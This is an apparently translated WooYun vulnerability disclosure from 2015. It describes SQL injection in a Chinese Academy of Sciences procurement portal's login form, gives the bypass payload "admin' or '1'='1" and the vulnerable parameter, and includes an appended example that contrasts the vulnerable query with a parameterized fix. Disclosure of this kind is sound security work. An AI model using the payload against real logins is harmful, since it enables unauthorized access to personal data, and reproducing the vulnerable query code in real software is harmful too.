Vulnerability summary

Defect ID: wooyun-2015-0141379

Title: SQL injection at a Chinese Academy of Sciences research institute leaks a large amount of internal information

Vendor: Chinese Academy of Sciences

Author: ksss

Submitted: 2015-09-19 12:01

Fixed: 2015-11-05 16:24

Published: 2015-11-05 16:24

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-19: Details sent to the vendor, awaiting vendor handling
2015-09-21: CNCERT (National Internet Emergency Center) has not yet been able to reach the responsible unit; details disclosed only to the reporting body
2015-10-01: Details disclosed to core white hats and domain experts
2015-10-11: Details disclosed to regular white hats
2015-10-21: Details disclosed to intern white hats
2015-11-05: Details disclosed to the public

Brief description:

I keep wondering where the world with big vendors is.

Detailed description:

[Screenshot: QQ截图20150915155252.png]

The procurement platform of the Shanghai Institutes for Biological Sciences, Chinese Academy of Sciences:

http://**.**.**.**/pages/login.aspx

The user login form is vulnerable to SQL injection.
By crafting the account name and entering any password, authentication can be bypassed to reach the backend:

admin' or '1'='1


[Screenshot: QQ截图20150915190934.png]

Through the injection, the database turns out to hold a large amount of product data and institute staff information.

http://**.**.**.**/pages/Login.aspx


Injected parameter: tbUserName

[Screenshot: QQ图片20150915191425.jpg]

Millions of product records, plus institute staff names, email addresses, phone numbers, office locations and so on.

[Screenshot: QQ截图20150915191713.png]

Proof of vulnerability:

[Screenshot: QQ图片20150915191425.jpg]

[Screenshot: QQ截图20150915191713.png]

Fix suggestion:

Filter the input.
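As an added illustration (not part of the original report or the affected site's code), the login check rebuilt the way the report describes it, beside the parameterized form that removes the bug. The user table, credentials and `login_*` function names are constructed stand-ins; the injected username is the one quoted in the report.

```python
import sqlite3

# Constructed stand-in for the portal's user table (in-memory, runs offline).
CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE users (username TEXT, password TEXT)")
CONN.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
CONN.commit()

# The username quoted in the report. Concatenated into the query text it yields
#   WHERE username = 'admin' or '1'='1' AND password = '...'
# and since AND binds tighter than OR, the admin row matches for any password.
BYPASS_USERNAME = "admin' or '1'='1"


def login_vulnerable(username: str, password: str) -> bool:
    """Mirrors the reported defect: user input is spliced into the SQL string."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return CONN.execute(sql).fetchone()[0] > 0


def login_safe(username: str, password: str) -> bool:
    """Fixed form: the SQL text is constant and the input is bound as parameters,
    so a quote in the username can only ever be compared as data.
    (A real fix would also compare against a stored password hash rather than
    the plaintext kept here for brevity.)"""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return CONN.execute(sql, (username, password)).fetchone()[0] > 0
```

Quote-stripping filters of the kind the report suggests are fragile (every input path and encoding must be covered); binding parameters removes the class of bug rather than one payload.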

Copyright notice: please credit the source when reposting: ksss@乌云 (WooYun)

Vendor response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-21 16:23

Vendor reply:

CNVD has confirmed the described situation and has forwarded it via CNCERT to the Chinese Academy of Sciences Computer Network Management Center, which will coordinate follow-up handling with the unit that manages the site.

Latest status:

None yet